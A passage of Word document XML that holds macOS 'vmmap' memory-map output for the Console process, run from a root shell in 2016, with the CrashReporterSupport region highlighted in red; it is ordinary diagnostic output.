    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 00007fffc86a6000-00007fffc86b4000 [   56K] r-x/r-x SM=COW  /System/Library/PrivateFrameworks/CrashReporterSupport.framework/Versions/A/</w:t>
      </w:r>
      <w:r w:rsidRPr="00236B14">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>CrashReporterSupport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__DATA                 00007fffd8d8f000-00007fffd8d93000 [   16K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CrashReporterSupport.framework/Versions/A/CrashReporterSupport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">sh-3.2# vmmap 23599 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Process:         Console [23599]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Path:            /Applications/Utilities/Console.app/Contents/MacOS/Console</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Load Address:    0x109eb8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Identifier:      com.apple.Console</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Version:         1.0 (1.7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Build Info:      Console2-1007000000000~15</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Code Type:       X86-64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Parent Process:  launchd [1]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14"/>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Date/Time:       2016-12-05 14:48:43.689 +0800</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Launch Time:     2016-12-05 11:28:15.805 +0800</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>OS Version:      Mac OS X 10.12.1 (16B2555)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Report Version:  7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Analysis Tool:   /usr/bin/vmmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>----</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14"/>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Virtual Memory Map of process 23599 (Console)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>Output report format:  2.4  -- 64-bit process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>VM page size:  4096 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14"/>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>==== Non-writable regions for process 23599</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 0000000109eb8000-0000000109f34000 [  496K] r-x/rwx SM=COW  /Applications/Utilities/Console.app/Contents/MacOS/Console</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>__LINKEDIT             0000000109f4e000-0000000109f5c000 [   56K] r--/rwx SM=COW  /Applications/Utilities/Console.app/Contents/MacOS/Console</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC metadata        0000000109f5e000-0000000109f5f000 [    4K] r--/rwx SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 0000000109f5f000-0000000109fc6000 [  412K] r-x/rwx SM=COW  /System/Library/PrivateFrameworks/ConsoleKit.framework/Versions/A/ConsoleKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__LINKEDIT             0000000109fe9000-000000010a020000 [  220K] r--/rwx SM=COW  /System/Library/PrivateFrameworks/ConsoleKit.framework/Versions/A/ConsoleKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC metadata        000000010a020000-000000010a021000 [    4K] r--/rwx SM=COW  MallocHelperZone_0x10a020000 zone structure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC guard page      000000010a022000-000000010a023000 [    4K] ---/rwx SM=NUL  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC guard page      000000010a038000-000000010a03a000 [    8K] ---/rwx SM=NUL  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC guard page      000000010a04f000-000000010a050000 [    4K] ---/rwx SM=NUL  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC metadata        000000010a050000-000000010a051000 [    4K] r--/rwx SM=COW  DefaultMallocZone_0x10a050000 zone structure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>MALLOC metadata        000000010a062000-000000010a063000 [    4K] r--/rwx SM=COW  GFXMallocZone_0x10a062000 zone structure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC guard page      000000010a064000-000000010a065000 [    4K] ---/rwx SM=NUL  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC guard page      000000010a07a000-000000010a07c000 [    8K] ---/rwx SM=NUL  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">MALLOC guard page      000000010a091000-000000010a092000 [    4K] ---/rwx SM=NUL  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">shared memory          000000010a092000-000000010a093000 [    4K] r--/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">shared memory          000000010a0d3000-000000010a0db000 [   32K] r--/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010a0db000-000000010b991000 [ 24.7M] r--/r-x SM=ALI  /usr/share/icu/icudt57l.dat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">VM_ALLOCATE            000000010b991000-000000010b995000 [   16K] r--/r-- SM=S/A  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">shared memory          000000010b995000-000000010b996000 [    4K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">shared memory          000000010b997000-000000010b99d000 [   24K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">shared memory          000000010b99d000-000000010b99e000 [    4K] r--/rw- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">shared memory          000000010b9a0000-000000010b9a3000 [   12K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  000000010b9a4000-000000010b9a5000 [    4K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010b9a5000-000000010bc3c000 [ 2652K] r--/rwx SM=COW  /System/Library/CoreServices/SystemAppearance.bundle/Contents/Resources/Assets.car</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  000000010bc3c000-000000010bc3d000 [    4K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 000000010bc46000-000000010bc5e000 [   96K] r-x/rwx SM=COW  ...works/Accelerate.framework/Versions/A/Frameworks/vImage.framework/Versions/A/Libraries/libCGInterfaces.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__LINKEDIT             000000010bc5f000-000000010bc69000 [   40K] r--/rwx SM=COW  ...works/Accelerate.framework/Versions/A/Frameworks/vImage.framework/Versions/A/Libraries/libCGInterfaces.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010bcd7000-000000010bcf3000 [  112K] r--/rwx SM=COW  /Applications/Utilities/Console.app/Contents/Resources/Fonts/SFMono-Regular.otf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">mapped file            000000010bcf3000-000000010bd44000 [  324K] r--/rwx SM=COW  </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/System/Library/CoreServices/SystemAppearance.bundle/Contents/Resources/VibrantLightAppearance.car</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">shared memory          000000010bd48000-000000010bd91000 [  292K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010bd91000-000000010c15c000 [ 3884K] r--/rwx SM=COW  /System/Library/CoreServices/SystemAppearance.bundle/Contents/Resources/SystemAppearance.car</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">IOKit                  000000010c15c000-000000010c15d000 [    4K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c17b000-000000010c17c000 [    4K] r--/rwx SM=COW  /private/var/db/datadetectors/sys/ParsecLowFreq.ddsource</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010c17e000-000000010c17f000 [    4K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c184000-000000010c185000 [    4K] r--/r-- SM=PRV  /private/var/db/uuidtext/5B/5604496A7730F989EBA54C714BB280</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c185000-000000010c188000 [   12K] r--/r-- SM=S/A  /private/var/db/uuidtext/96/6D5575E09233A48CD8595EB6AA637A</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010c189000-000000010c18a000 [    4K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c18a000-000000010c18b000 [    4K] r--/rwx SM=COW  /private/var/db/datadetectors/sys/ParsecHighFreq.ddsource</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c190000-000000010c193000 [   12K] r--/r-- SM=PRV  /private/var/db/uuidtext/C0/BEDCD0F7EC352A928F4A1EA68383C2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c198000-000000010c19c000 [   16K] r--/r-- SM=S/A  /private/var/db/uuidtext/CD/935550133E39A8965D3B4E41E0888F</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c19c000-000000010c19e000 [    8K] r--/r-- SM=S/A  /private/var/db/uuidtext/27/05777E7CF7359EAA5F76914CDEECC7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c1a5000-000000010c1a9000 [   16K] r--/r-- SM=S/A  /private/var/db/uuidtext/78/9257B25F0233E38495C1DA3D4F4964</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c1c1000-000000010c1c3000 [    8K] r--/r-- SM=S/A  /private/var/db/uuidtext/27/05777E7CF7359EAA5F76914CDEECC7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>mapped file            000000010c1c4000-000000010c1ca000 [   24K] r--/r-- SM=S/A  /private/var/db/uuidtext/20/B629EE9D603223887BB6BC5E58E39E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c1cf000-000000010c1d7000 [   32K] r--/r-- SM=S/A  /private/var/db/uuidtext/78/9257B25F0233E38495C1DA3D4F4964</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c1da000-000000010c1de000 [   16K] r--/r-- SM=S/A  /private/var/db/uuidtext/CD/935550133E39A8965D3B4E41E0888F</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c1de000-000000010c1e4000 [   24K] r--/r-- SM=S/A  /private/var/db/uuidtext/20/B629EE9D603223887BB6BC5E58E39E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c1e4000-000000010c1e8000 [   16K] r--/r-- SM=S/A  /private/var/db/uuidtext/CD/935550133E39A8965D3B4E41E0888F</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c1fa000-000000010c1fe000 [   16K] r--/r-- SM=S/A  /private/var/db/uuidtext/CD/935550133E39A8965D3B4E41E0888F</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c203000-000000010c205000 [    8K] r--/r-x SM=ALI  /Library/Caches/com.apple.iconservices.store/A8F87209-BFCD-00E5-235B-E1B28ABBADA6.isdata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c205000-000000010c20d000 [   32K] r--/r-- SM=S/A  /private/var/db/uuidtext/78/9257B25F0233E38495C1DA3D4F4964</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c20d000-000000010c210000 [   12K] r--/r-- SM=S/A  /private/var/db/uuidtext/96/6D5575E09233A48CD8595EB6AA637A</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c213000-000000010c217000 [   16K] r--/r-- SM=S/A  /private/var/db/uuidtext/CD/935550133E39A8965D3B4E41E0888F</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010c221000-000000010c222000 [    4K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 000000010c222000-000000010c228000 [   24K] r-x/rwx SM=COW  /usr/lib/libgermantok.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__LINKEDIT             000000010c229000-000000010c22d000 [   16K] r--/rwx SM=COW  /usr/lib/libgermantok.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c231000-000000010c237000 [   24K] r--/r-- SM=S/A  /private/var/db/uuidtext/20/B629EE9D603223887BB6BC5E58E39E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c242000-000000010c248000 [   24K] r--/r-- SM=S/A  /private/var/db/uuidtext/20/B629EE9D603223887BB6BC5E58E39E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>mapped file            000000010c255000-000000010c262000 [   52K] r--/rwx SM=COW  /System/Library/LinguisticData/Latn/Dict2.dat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c298000-000000010c2ac000 [   80K] r--/rwx SM=COW  /private/var/folders/fv/1m56tx611tb28kv27w07st6r0000gn/C/com.apple.IntlDataCache.le.kbdx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c2ba000-000000010c2c0000 [   24K] r--/r-- SM=S/A  /private/var/db/uuidtext/20/B629EE9D603223887BB6BC5E58E39E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c2c0000-000000010c2ca000 [   40K] r--/r-- SM=S/A  /private/var/db/uuidtext/3E/DD9980A1C03CBAAEB5561FB3291EAD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c379000-000000010c383000 [   40K] r--/r-- SM=S/A  /private/var/db/uuidtext/3E/DD9980A1C03CBAAEB5561FB3291EAD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 000000010c390000-000000010c3a8000 [   96K] r-x/rwx SM=COW  /System/Library/PrivateFrameworks/Lookup.framework/Versions/A/Lookup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__LINKEDIT             000000010c3af000-000000010c3bc000 [   52K] r--/rwx SM=COW  /System/Library/PrivateFrameworks/Lookup.framework/Versions/A/Lookup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c446000-000000010c459000 [   76K] r--/r-- SM=S/A  /private/var/db/uuidtext/40/37DE6A8E6C3655AE7CC4BB2B1DA8B5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c45e000-000000010c494000 [  216K] r--/rwx SM=COW  /System/Library/LinguisticData/Latn/Dict1.dat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010c522000-000000010c6d1000 [ 1724K] r--/rwx SM=COW  /System/Library/Fonts/SFNSText.ttf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">shared memory          000000010cbfe000-000000010cbff000 [    4K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cc34000-000000010cc36000 [    8K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cc3d000-000000010cc3e000 [    4K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cc4b000-000000010cc4c000 [    4K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cc53000-000000010cc55000 [    8K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cc7e000-000000010cc80000 [    8K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010cc88000-000000010cc89000 [    4K] r--/r-- SM=PRV  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CoreAnimation          000000010ccdc000-000000010ccdd000 [    4K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t xml:space="preserve">CoreAnimation          000000010ccf1000-000000010ccf2000 [    4K] r--/r-- SM=SHM  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>mapped file            000000010cd83000-000000010cd85000 [    8K] r--/r-x SM=ALI  /Library/Caches/com.apple.iconservices.store/C8672CBD-10F4-3B1A-DD79-8B314F2EAD2C.isdata</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 000000010d083000-000000010d22a000 [ 1692K] r-x/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Resources/GLEngine.bundle/GLEngine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__LINKEDIT             000000010d22d000-000000010d267000 [  232K] r--/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Resources/GLEngine.bundle/GLEngine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 000000010d267000-000000010d3de000 [ 1500K] r-x/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLProgrammability.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__GLSLBUILTINS         000000010d3ea000-000000010d671000 [ 2588K] r--/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLProgrammability.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__LINKEDIT             000000010d671000-000000010d695000 [  144K] r--/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLProgrammability.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__TEXT                 000000010d695000-000000010dbf6000 [ 5508K] r-x/rwx SM=COW  /System/Library/Extensions/AppleIntelBDWGraphicsGLDriver.bundle/Contents/MacOS/AppleIntelBDWGraphicsGLDriver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
        <w:t>__LINKEDIT             000000010dc75000-000000010de0f000 [ 1640K] r--/rwx SM=COW  /System/Library/Extensions/AppleIntelBDWGraphicsGLDriver.bundle/Contents/MacOS/AppleIntelBDWGraphicsGLDriver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00236B14" w:rsidRDefault="00236B14" w:rsidP="00236B14">
      <w:r>
